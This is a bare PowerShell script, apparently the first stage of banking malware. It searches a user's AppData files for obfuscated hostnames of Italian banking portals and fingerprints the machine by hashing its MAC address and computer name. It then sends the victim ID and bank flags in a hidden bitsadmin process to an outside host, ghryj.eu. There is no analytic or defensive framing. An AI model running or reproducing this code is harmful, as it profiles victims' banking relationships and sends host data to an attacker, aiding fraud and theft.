cd $env:appdata\.. $n=1; $b=@("cbi.bper0group.net","busin0ess.bnl.it","ibk.ne0xi.it","inbiz.inte0sasanpaolo.com","bpe0rgroup.net","inb0ank.it","finecob0ank.com"); $o=""; $c=""; for ($i=0;$i -le 6; $i++){ $rr=""; $bb=$b[$i] -replace "0" $rr=findstr /m /s $bb *.* if ($rr.length){ $o+="1"; $c="00000000"; }else{ $o+="0" } } if ($c -eq ""){ $e=@("aziendaonl0ine.mps.it","banking-impr0ese.credem.it","clienti.che0banca.it"); for ($i=0;$i -le 2; $i++){ $rr=""; $bb=$e[$i] -replace "0" $rr=findstr /m /s $bb *.* if ($rr.length){ $c+="1"; }else{ $c+="0" } } } $edfaiu=getmac /fo table | select-object -last 1; $haha=$edfaiu.substring(0,17); [Reflection.Assembly]::LoadWithPartialName("System.Web") $hMD5=[System.Web.Security.FormsAuthentication]::HashPasswordForStoringInConfigFile($haha+$env:ComputerName, "MD5").tolower(); $startup=[wmiclass]"Win32_ProcessStartup" $startup.Properties['ShowWindow'].value=$False $MrMeeseeks='bitsadmin /transfer bupl /priority FOREGROUND "https://ghryj.eu/fbf.php?id='+$hMD5+'&f='+$o+'&c='+$c+'" '+$env:temp+'\123.log'; ([wmiclass]"win32_Process").create($MrMeeseeks,'.',$Startup)